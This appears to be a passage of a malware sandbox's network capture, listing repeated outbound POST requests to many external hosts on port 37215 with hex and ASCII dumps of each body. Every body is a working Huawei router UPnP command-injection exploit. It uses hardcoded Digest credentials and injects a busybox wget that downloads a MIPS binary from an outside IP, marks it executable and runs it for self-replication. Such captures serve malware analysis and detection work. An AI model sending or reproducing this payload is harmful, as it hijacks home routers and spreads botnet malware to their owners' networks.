                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          888192.168.2.2359620197.171.143.837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.265811920 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          889192.168.2.2341412197.12.220.12937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.265949965 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          890192.168.2.2359568157.214.204.24037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266222954 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          891192.168.2.235483841.216.185.3037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266228914 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          892192.168.2.2349212157.209.249.25437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266230106 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          893192.168.2.234660084.177.135.13137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266244888 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          894192.168.2.2345926157.203.158.20937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266252995 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          895192.168.2.2352552157.215.121.1337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266258001 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          896192.168.2.2352644197.212.9.11737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266262054 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          897192.168.2.2339834197.224.140.1837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.266277075 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
